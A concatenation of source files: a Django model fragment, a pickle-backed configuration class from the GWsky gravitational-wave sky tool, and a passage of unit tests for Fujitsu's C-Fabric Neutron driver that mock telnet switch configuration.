'create': CreateRole,
'write': WriteRole
}
class Meta:
unique_together = ('subject', 'principal')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
import cPickle as pickle
except:
import pickle
class UserValues(object):
"""
Creating a class in which the instance attributes are based on the dictionary
'GWsky_config' by default. GWsky_config is created and pickled by the 'user_values' *** ***
module and will be deleted when the program will be closed.
"""
def __init__(self, infile_config='GWsky_config'):
"""
'GWsky_config' contains the keys below:
self.skymap: a valid LVC skymap in healpix format;
self.nside: Resolution parameter of HEALPIX
Geodetic coordinates of the Observatory:
self.latitude: latitude[deg];
self.longitude: longitude[deg];
self.altitude: altitude[m];
self.catalog: catalog name in Vizier code
self.obs_time: starting time [yyyy-mm-dd hh:mm:ss];
self.fov_width: field-of-view width [deg] -->> if selected;
self.fov_height: field-of-view height [deg] -->> if selected;
self.fov_radius: field-of-view radius [deg] -->> if selected;
self.fov_shape: (1) box or (2) circle;
self.ra_max_pixel: right ascension of maximum probability pixel [deg];
self.dec_max_pixel: declination of maximum probability pixel [deg];
self.GWsky_basic: ('A') active statistic window;
: ('D') deactive statistic window;
self.trasparency: window trasparency
self.column_1: first catalog column selected by user;
self.column_2: second catalog column selected by user;
self.filter_1: applied filter in colomn 1;
self.filter_2: applied filter in colomn 2.
"""
self.infile_config = infile_config
with open(self.infile_config, 'rb') as data:
config_GWsky = pickle.load(data)
for k, v in config_GWsky.items():
setattr(self, k, v)
def set_infile_config(self, new_infile_config):
self.infile_config = new_infile_config
def get_infile_config(self):
return self.infile_config
def set_skymap(self, new_skymap):
self.skymap = new_skymap
def get_skymap(self):
return self.skymap
def set_nside(self, new_nside):
self.nside = new_nside
def get_nside(self):
return self.nside
def set_latitude(self, new_latitude):
self.latitude = new_latitude
def get_latitude(self):
return self.latitude
def set_longitude(self, new_longitude):
self.longitude = new_longitude
def get_longitude(self):
return self.longitude
def set_altitude(self, new_altitude):
self.altitude = new_altitude
def get_altitude(self):
return self.altitude
def set_catalog(self, new_catalog):
self.catalog = new_catalog
def get_catalog(self):
return self.catalog
def set_obs_time(self, new_obs_time):
self.obs_time = new_obs_time
def get_obs_time(self):
return self.obs_time
def set_fov_width(self, new_fov_width):
self.fov_width = new_fov_width
def get_fov_width(self):
return self.fov_width
def set_fov_height(self, new_fov_height):
self.fov_height = new_fov_height
def get_fov_height(self):
return self.fov_height
def set_fov_radius(self, new_fov_radius):
self.fov_radius = new_fov_radius
def get_fov_radius(self):
return self.fov_radius
def set_ra_max_pixel(self, new_ra_max_pixel):
self.ra_max_pixel = new_ra_max_pixel
def get_ra_max_pixel(self):
return self.ra_max_pixel
def set_dec_max_pixel(self, new_dec_max_pixel):
self.dec_max_pixel = new_dec_max_pixel
def get_dec_max_pixel(self):
return self.dec_max_pixel
def set_GWsky_basic(self, new_GWsky_basic):
self.GWsky_basic = new_GWsky_basic
def get_GWsky_basic(self):
return self.GWsky_basic
def set_win_trasparency(self):
return self.trasparency
def get_win_trasparency(self):
return self.trasparency
def set_column_1(self, new_column_1):
self.column_1 = new_column_1
def get_column_1(self):
return self.column_1
def set_column_2(self, new_column_2):
self.column_2 = new_column_2
def get_column_2(self):
return self.column_2
def set_get_filter_1(self, new_filter_1):
self.filter_1 = new_filter_1
def get_filter_1(self):
return self.filter_1
def set__filter_2(self, new_filter_2):
self.filter_2 = new_filter_2
def get_filter_2(self):
return self.filter_2
def set_fov_shape(self, new_fov_shape):
self.fov_shape = self.new_fov_shape
def get_fov_shape(self):
return self.fov_shape
def __repr__(self):
with open(self.infile_config, 'rb') as data:
config_GWsky = pickle.load(data)
return str(config_GWsky)
|
# Copyright 2015-2016 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import os
import re
import select
import socket
import testtools
import time
from itertools import chain
from networking_fujitsu.ml2.cfab import cfabdriver
from networking_fujitsu.ml2.cfab.mech_cfab import cfg
from neutron.common import utils
from neutron.plugins.ml2.common import exceptions as ml2_exc
from neutron.plugins.ml2 import config as ml2_config
from neutron.tests import base
FUJITSU_CFAB = "networking_fujitsu.ml2.cfab."
_CFABDRIVER__CFABMANAGER = FUJITSU_CFAB + "cfabdriver._CFABManager"
_TELNETLIB_TELNET = FUJITSU_CFAB + "cfabdriver.telnetlib.Telnet"
_EXCLUDE_BRACKET_LINE_RE = re.compile(r"^[^[].*$", re.MULTILINE)
class BaseTestMockedCFABManager(base.BaseTestCase):
"""Base class to test Fujitsu C-Fabric manager."""
def setUp(self):
super(BaseTestMockedCFABManager, self).setUp()
self.manager = cfabdriver._CFABManager()
self.manager.close_session = mock.MagicMock()
def assert_wrote(self, lines):
telnet = self.manager._telnet
""":type : mock.MagicMock"""
self.assertEqual(
lines, [x[0][0] for x in telnet.write.call_args_list])
class TestMockedCFABManager(BaseTestMockedCFABManager):
"""Test Fujitsu C-Fabric manager."""
def test_connect(self):
with mock.patch(_TELNETLIB_TELNET, autospec=True) as telnet:
self.manager.connect("address", "username", "password")
telnet.assert_called_once_with(
host="address",
port=cfabdriver.TELNET_PORT,
timeout=cfabdriver._TIMEOUT)
self.assert_wrote(["username\n", "password\n"])
def test_connect_fail(self):
with mock.patch(_TELNETLIB_TELNET, autospec=True) as telnet:
telnet.side_effect = socket.error
self.assertRaises(
socket.error,
self.manager.connect, "address", "username", "password")
def test_reconnect_raise_exceptions(self):
with mock.patch(_TELNETLIB_TELNET, autospec=True) as telnet:
for er in [EOFError, EnvironmentError, ValueError, OSError]:
tel = telnet.return_value
tel.read_until.side_effect = er
self.manager.close_session()
self.assertRaises(er, self.manager._reconnect)
self.assertEqual(0, self.manager._retry_count)
def test_reconnect_busy_and_retry(self):
busy = 'The system is busy. Please login after waiting for a while.\n'
max_session = 'Login failed to switch.(too many sessions. bye!\n)'
with mock.patch(_TELNETLIB_TELNET, autospec=True) as telnet:
tel = telnet.return_value
tel.read_until.side_effect = [busy,
max_session,
cfabdriver._PROMPT_LOGIN,
cfabdriver._PROMPT_PASS,
cfabdriver._PROMPT_ADMIN]
time.sleep = mock.MagicMock()
time.sleep.side_effect = None
self.manager.connect("address", "username", "password")
self.assertEqual(3, self.manager.close_session.call_count)
self.assertEqual(0, self.manager._retry_count)
time.sleep.assert_called_with(cfabdriver._WAIT_FOR_BUSY)
def test_reconnect_busy_and_reached_maxium_retry(self):
busy = 'The system is busy. Please login after waiting for a while.\n'
with mock.patch(_TELNETLIB_TELNET, autospec=True) as telnet:
tel = telnet.return_value
tel.read_until.return_value = busy
time.sleep = mock.MagicMock()
time.sleep.side_effect = None
self.assertRaises(
ValueError,
self.manager.connect, "address", "username", "password")
retry_count = cfabdriver._TIMEOUT / cfabdriver._WAIT_FOR_BUSY
self.assertEqual(12, self.manager.close_session.call_count)
self.assertEqual(retry_count, time.sleep.call_count)
self.assertEqual(0, self.manager._retry_count)
class BaseTestMockedCFABManagerConnected(BaseTestMockedCFABManager):
"""Base class to test Fujitsu C-Fabric manager after connected."""
def setUp(self):
super(BaseTestMockedCFABManagerConnected, self).setUp()
with mock.patch(_TELNETLIB_TELNET, autospec=True):
self.manager.connect("address", "username", "password")
self.prompt = "# "
def read_until(*args, **kwargs):
return "(config)# "
def expect(*args, **kwargs):
s = self.prompt
m = args[0][0].search(s)
return 0 if m is not None else -1, m, s
self.manager._telnet.read_until.side_effect = read_until
self.manager._telnet.expect.side_effect = expect
class TestMockedCFABManagerConnected(BaseTestMockedCFABManagerConnected):
"""Test Fujitsu C-Fabric manager after connected.
"""
def test_get_candidate_config(self):
candidate_config = self.manager.get_candidate_config()
self.assertEqual(
mock.call("show candidate-config\n"),
self.manager._telnet.write.call_args)
self.assertEqual("", candidate_config)
def test_get_running_config(self):
running_config = self.manager.get_running_config()
self.assertEqual(
mock.call("show running-config\n"),
self.manager._telnet.write.call_args)
self.assertEqual("", running_config)
def test_configure(self):
cmd = "pprofile 1 vlan tag 1"
self.manager.configure([cmd])
call_args_list = self.manager._telnet.write.call_args_list
self.assertIn(mock.call("configure\n"), call_args_list)
self.assertIn(mock.call(cmd + "\n"), call_args_list)
self.assertIn(mock.call("commit\n"), call_args_list)
self.assertEqual(
mock.call("save\n"), self.manager._telnet.write.call_args)
def test_configure_without_commit(self):
cmd = "pprofile 1 vlan tag 1"
self.manager.configure([cmd], commit=False)
call_args_list = self.manager._telnet.write.call_args_list
self.assertIn(mock.call("configure\n"), call_args_list)
self.assertIn(mock.call(cmd + "\n"), call_args_list)
self.assertNotIn(mock.call("commit\n"), call_args_list)
class TestMockedCFABManagerConnectedWithoutSave(
BaseTestMockedCFABManagerConnected):
"""Test Fujitsu C-Fabric manager after connected without save.
"""
def setUp(self):
super(TestMockedCFABManagerConnectedWithoutSave, self).setUp()
self.manager.save_config = False
def test_configure_without_save(self):
cmd = "pprofile 1 vlan tag 1"
self.manager.configure([cmd])
call_args_list = self.manager._telnet.write.call_args_list
self.assertIn(mock.call("configure\n"), call_args_list)
self.assertIn(mock.call(cmd + "\n"), call_args_list)
self.assertEqual(
mock.call("commit\n"), self.manager._telnet.write.call_args)
self.assertNotIn(mock.call("save\n"), call_args_list)
@testtools.skipUnless(
'OS_FUJITSU_CFAB_ADDRESS' in os.environ,
"OS_FUJITSU_CFAB_ADDRESS environment variable is not defined.")
class TestCFABManager(base.BaseTestCase):
"""Test Fujitsu C-Fabric manager using the real telnet connection.
Tests will be performed using the C-Fabric CLI through a telnet connection
to the address OS_FUJITSU_CFAB_ADDRESS and the port OS_FUJITSU_CFAB_PORT
(defaults to 23). The username will be taken from OS_FUJITSU_CFAB_USERNAME
(defaults to "admin") and the password will be taken from
OS_FUJITSU_CFAB_PASSWORD (defaults to "password").
If the environment variable OS_FUJITSU_CFAB_ADDRESS is NOT defined, tests
will be skipped.
"""
def _setup_lock(self):
"""Set up lock_path so that all tests are serialized.
This is necessary to keep the C-Fabric config consistent within each
test.
"""
try:
ml2_config.cfg.CONF.set_override('lock_path', "lock")
except ml2_config.cfg.NoSuchOptError:
ml2_config.cfg.CONF.set_override(
'lock_path', "lock", "oslo_concurrency")
def setUp(self):
super(TestCFABManager, self).setUp()
self._setup_lock()
try:
cfabdriver.TELNET_PORT = int(os.environ['OS_FUJITSU_CFAB_PORT'])
except KeyError:
pass
self.manager = cfabdriver.CFAB_MANAGER
self.manager.connect(
os.environ.get('OS_FUJITSU_CFAB_ADDRESS'),
os.environ.get('OS_FUJITSU_CFAB_USERNAME') or "admin",
os.environ.get('OS_FUJITSU_CFAB_PASSWORD') or "password",
)
def assert_running_config(self, prefix, expected_config):
running_config = self.manager.get_running_config(prefix=prefix)
self.assertEqual(
expected_config, _EXCLUDE_BRACKET_LINE_RE.findall(running_config))
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_modes(self):
self.manager._close_session()
self.assertEqual(cfabdriver._MODE_ADMIN, self.manager._get_mode())
self.manager._execute("configure")
self.assertEqual(cfabdriver._MODE_CONFIG, self.manager._get_mode())
self.manager._execute("interface 1/1/1/1")
self.assertEqual(cfabdriver._MODE_CONFIG_IF, self.manager._get_mode())
self.manager._execute("exit")
self.assertEqual(cfabdriver._MODE_CONFIG, self.manager._get_mode())
self.manager._execute("exit")
self.assertEqual(cfabdriver._MODE_ADMIN, self.manager._get_mode())
self.manager._execute("exit")
self.assertEqual(cfabdriver._MODE_USER, self.manager._get_mode())
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_get_running_config(self):
self.manager.configure(
["no pprofile",
"pprofile 1 vlan tag 1",
"pprofile 2 vlan tag 2"])
running_config = self.manager.get_running_config()
self.assertEqual(
["pprofile 1 vlan tag 1", "pprofile 2 vlan tag 2"],
re.findall(r"^pprofile\s+.+$", running_config, re.MULTILINE))
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_get_running_config_prefix(self):
self.manager.configure(
["no pprofile",
"pprofile 1 vlan tag 1",
"pprofile 2 vlan tag 2"])
self.assert_running_config(
"pprofile", ["1 vlan tag 1", "2 vlan tag 2"])
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_configure(self):
self.manager.configure(["no pprofile"])
self.assert_running_config("pprofile", [])
self.manager.configure(["pprofile 1 vlan tag 1"])
self.assert_running_config("pprofile", ["1 vlan tag 1"])
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_configure_from_interface_config(self):
self.manager.configure(["no pprofile"])
self.manager._execute("interface 1/1/1/1")
self.manager.configure(["pprofile 1 vlan tag 1"])
self.assert_running_config("pprofile", ["1 vlan tag 1"])
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_configure_from_user(self):
self.manager.configure(["no pprofile"])
self.manager._execute("exit")
self.manager._execute("exit")
self.manager.configure(["pprofile 1 vlan tag 1"])
self.assert_running_config("pprofile", ["1 vlan tag 1"])
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_configure_from_closed(self):
self.manager.configure(["no pprofile"])
self.manager._close_session()
self.manager.configure(["pprofile 1 vlan tag 1"])
self.assert_running_config("pprofile", ["1 vlan tag 1"])
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_configure_no_commit(self):
self.manager.configure(["no pprofile"])
self.manager.configure(["pprofile 1 vlan tag 1"], commit=False)
self.assert_running_config("pprofile", [])
self.manager.configure([])
self.assert_running_config("pprofile", ["1 vlan tag 1"])
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_configure_error(self):
self.assertRaises(
ml2_exc.MechanismDriverError, self.manager.configure, ["error"])
class BaseTestCFABdriver(base.BaseTestCase):
"""Base class to test Fujitsu C-Fabric mechanism driver.
"""
def setUp(self):
self.ports = "1/1/0/1"
self.mac = "00:01:02:03:04:05"
super(BaseTestCFABdriver, self).setUp()
with mock.patch(_CFABDRIVER__CFABMANAGER, autospec=True) as mocked:
self.driver = cfabdriver.CFABdriver(cfg.CONF)
self.driver.mgr = mocked.return_value
def assert_configured(self, cmds):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
tmp = [x[0][0] for x in mgr.configure.call_args_list]
actual = list(chain.from_iterable(tmp))
self.assertEqual(cmds, actual)
# Make sure that only the last configure has commit=True.
commits = [x[1].get('commit', True)
for x in mgr.configure.call_args_list]
self.assertTrue(commits.pop())
commits.append(False)
self.assertEqual({False}, set(commits))
class TestCFABdriver(BaseTestCFABdriver):
"""Test Fujitsu C-Fabric mechanism driver.
"""
def test_associate_mac_to_network_raises(self):
self.driver.mgr = mock.Mock()
mgr = self.driver.mgr
cfab = self.driver
for er in [EOFError, EnvironmentError, OSError, select.error]:
mgr.connect.side_effect = er
self.assertRaises(er, cfab.associate_mac_to_network,
'a', 'u', 'p', '1', 8, self.mac)
mgr.connect.side_effect = ml2_exc.MechanismDriverError(
method='connect')
self.assertRaises(ml2_exc.MechanismDriverError,
cfab.associate_mac_to_network,
'a', 'u', 'p', '1', 8, self.mac)
self.assertEqual(5, mgr.close_session.call_count)
def test_disassociate_mac_from_network_raises(self):
self.driver.mgr = mock.Mock()
mgr = self.driver.mgr
cfab = self.driver
for er in [EOFError, EnvironmentError, OSError, select.error]:
mgr.connect.side_effect = er
self.assertRaises(er, cfab.dissociate_mac_from_network,
'a', 'u', 'p', '1', 8, self.mac)
mgr.connect.side_effect = ml2_exc.MechanismDriverError(
method='connect')
self.assertRaises(ml2_exc.MechanismDriverError,
cfab.dissociate_mac_from_network,
'a', 'u', 'p', '1', 8, self.mac)
self.assertEqual(5, mgr.close_session.call_count)
def test_associate_mac_to_network(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = (
"""pprofile 00:01:02:03:04:05 vlan tag 2
vfab 4 pprofile 0 vsiid mac 00:01:02:03:04:05 00:01:02:03:04:05
""")
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
mgr.close_session.assert_called_once_with()
self.assert_configured(
["vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 "
"00:01:02:03:04:05"])
def test_associate_mac_to_network_no_pprofile(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = ""
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["pprofile 00:01:02:03:04:05 vlan tag 2",
"vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 "
"00:01:02:03:04:05"])
def test_associate_mac_to_network_existing(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = (
"""pprofile 00:01:02:03:04:05 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 00:01:02:03:04:05
""")
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assertFalse(mgr.configure.called)
def test_associate_mac_to_network_existing_override(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = (
"""pprofile test-2 vlan tag 2
vfab 3 pprofile 1 vsiid mac 00:01:02:03:04:05 test-2
""")
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["pprofile 00:01:02:03:04:05 vlan tag 2",
"vfab 3 pprofile 1 vsiid mac 00:01:02:03:04:05 "
"00:01:02:03:04:05"])
def test_associate_mac_to_network_override_pprofile(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = (
"""pprofile 00:01:02:03:04:05 vlan tag 1,2
vfab 4 pprofile 0 vsiid mac 00:01:02:03:04:05 00:01:02:03:04:05
""")
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["pprofile 00:01:02:03:04:05 vlan tag 2",
"vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 "
"00:01:02:03:04:05"])
def test_dissociate_mac_from_network(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = (
"""pprofile 00:01:02:03:04:05 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 00:01:02:03:04:05
""")
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["no vfab 3 pprofile 0",
"no pprofile 00:01:02:03:04:05"])
def test_dissociate_mac_from_network_still_used_in_other_vfab(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = (
"""pprofile 00:01:02:03:04:05 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 00:01:02:03:04:05
vfab 4 pprofile 0 vsiid mac 00:01:02:03:04:05 00:01:02:03:04:05
""")
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(["no vfab 3 pprofile 0"])
class TestCFABdriverSharePprofile(BaseTestCFABdriver):
"""Test Fujitsu C-Fabric mechanism driver with shared pprofile.
"""
def setUp(self):
cfg.CONF.set_override('share_pprofile', True, "fujitsu_cfab")
super(TestCFABdriverSharePprofile, self).setUp()
def test_associate_mac_to_network(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 2 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:00:00:00:00:01 2
"""
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.close_session.assert_called_once_with()
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["vfab 3 pprofile 1 vsiid mac 00:01:02:03:04:05 2"])
def test_associate_mac_to_network_no_pprofile(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = ""
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
mgr.close_session.assert_called_once_with()
self.assert_configured(
["pprofile 2 vlan tag 2",
"vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 2"])
def test_associate_mac_to_network_existing(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 1 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 1
"""
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.close_session.assert_called_once_with()
mgr.get_running_config.assert_called_once_with()
self.assertFalse(mgr.configure.called)
def test_associate_mac_to_network_existing_override(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 1 vlan tag 4
vfab 3 pprofile 1 vsiid mac 00:01:02:03:04:05 1
"""
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.close_session.assert_called_once_with()
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["pprofile 2 vlan tag 2",
"vfab 3 pprofile 1 vsiid mac 00:01:02:03:04:05 2"])
def test_dissociate_mac_from_network(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 1 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 1
"""
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.close_session.assert_called_once_with()
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["no vfab 3 pprofile 0",
"no pprofile 1"])
def test_dissociate_mac_from_network_still_used(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 1 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 1
vfab 3 pprofile 1 vsiid mac 00:01:02:03:04:06 1
"""
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.close_session.assert_called_once_with()
mgr.get_running_config.assert_called_once_with()
self.assert_configured(["no vfab 3 pprofile 0"])
def test_dissociate_mac_from_network_still_used_in_other_vfab(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 1 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 1
vfab 4 pprofile 0 vsiid mac 00:01:02:03:04:06 1
"""
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.close_session.assert_called_once_with()
mgr.get_running_config.assert_called_once_with()
self.assert_configured(["no vfab 3 pprofile 0"])
def test_dissociate_mac_from_network_no_match(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 1 vlan tag 4
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 1
"""
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.close_session.assert_called_once_with()
mgr.get_running_config.assert_called_once_with()
self.assertFalse(mgr.configure.called)
class TestCFABdriverSharedPprofilePrefixed(BaseTestCFABdriver):
"""Test Fujitsu C-Fabric mechanism driver with pprofile prefix.
"""
def setUp(self):
cfg.CONF.set_override('share_pprofile', True, "fujitsu_cfab")
cfg.CONF.set_override('pprofile_prefix', "test-", "fujitsu_cfab")
super(TestCFABdriverSharedPprofilePrefixed, self).setUp()
def test_associate_mac_to_network(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile test-2 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:00:00:00:00:01 test-2
"""
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.close_session.assert_called_once_with()
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["vfab 3 pprofile 1 vsiid mac 00:01:02:03:04:05 test-2"])
def test_associate_mac_to_network_no_pprofile(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = ""
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["pprofile test-2 vlan tag 2",
"vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 test-2"])
def test_dissociate_mac_from_network(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 1 vlan tag 2
pprofile test-1 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 test-1
vfab 4 pprofile 0 vsiid mac 00:01:02:03:04:06 1
"""
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["no vfab 3 pprofile 0",
"no pprofile test-1"])
def test_dissociate_mac_from_network_still_used(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile test-1 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 test-1
vfab 3 pprofile 1 vsiid mac 00:01:02:03:04:06 test-1
"""
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(["no vfab 3 pprofile 0"])
def test_dissociate_mac_from_network_still_used_in_other_vfab(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile test-1 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 test-1
vfab 4 pprofile 0 vsiid mac 00:01:02:03:04:06 test-1
"""
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(["no vfab 3 pprofile 0"])
def test_dissociate_mac_from_network_no_match(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 1 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 1
"""
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assertFalse(mgr.configure.called)
class TestCFABdriverPprofilePrefix(base.BaseTestCase):
"""Test Fujitsu C-Fabric mechanism driver for pprofile_prefix errors.
"""
def test_too_long(self):
cfg.CONF.set_override('pprofile_prefix', "a" * 29, "fujitsu_cfab")
with mock.patch(_CFABDRIVER__CFABMANAGER, autospec=True):
self.assertRaises(ValueError, cfabdriver.CFABdriver, cfg.CONF)
def test_illegal_character(self):
cfg.CONF.set_override('pprofile_prefix', '"', "fujitsu_cfab")
with mock.patch(_CFABDRIVER__CFABMANAGER, autospec=True):
self.assertRaises(ValueError, cfabdriver.CFABdriver, cfg.CONF)
class TestCFABdriverSetupVlan(BaseTestCFABdriver):
"""Test Fujitsu C-Fabric mechanism driver for VLAN configuration.
"""
def setUp(self):
cfg.CONF.set_override('pprofile_prefix', "test-", "fujitsu_cfab")
super(TestCFABdriverSetupVlan, self).setUp()
def test_raises(self):
mgr = self.driver.mgr
cfab = self.driver
for er in [EOFError, EnvironmentError, OSError, select.error]:
mgr.get_candidate_config.side_effect = er
self.assertRaises(er,
cfab.setup_vlan, 'a', 'u', 'p', '1', 8,
self.ports, self.mac)
self.assertEqual(4, mgr.close_session.call_count)
def test_no_preconfig_exist(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = "no_preconfig"
expect = []
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_already_configured_vlan_but_missing_interface(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
exit
vfab 1 vlan 8 endpoint untag 0
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
